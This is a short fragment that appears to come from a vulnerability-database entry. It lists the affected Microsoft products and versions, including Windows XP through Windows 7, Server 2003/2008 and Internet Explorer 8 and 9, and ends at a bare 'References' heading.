Microsoft>>Windows_2003_server >> Version *
Microsoft>>Windows_server_2003 >> Version *
Microsoft>>Windows_server_2008 >> Version *
Microsoft>>Windows_server_2008 >> Version *
Microsoft>>Windows_server_2008 >> Version -
Microsoft>>Windows_vista >> Version *
Microsoft>>Windows_vista >> Version -
Microsoft>>Windows_xp >> Version *
Microsoft>>Windows_xp >> Version -
Configuraton 0
Microsoft>>Internet_explorer >> Version 8
Microsoft>>Internet_explorer >> Version 9
Microsoft>>Windows_7 >> Version *
Microsoft>>Windows_7 >> Version *
Microsoft>>Windows_7 >> Version *
Microsoft>>Windows_7 >> Version -
Microsoft>>Windows_7 >> Version -
Microsoft>>Windows_server_2003 >> Version *
Microsoft>>Windows_server_2008 >> Version *
Microsoft>>Windows_server_2008 >> Version *
Microsoft>>Windows_server_2008 >> Version *
Microsoft>>Windows_server_2008 >> Version -
Microsoft>>Windows_server_2008 >> Version r2
Microsoft>>Windows_server_2008 >> Version r2
Microsoft>>Windows_vista >> Version *
Microsoft>>Windows_xp >> Version *
Microsoft>>Windows_xp >> Version -
References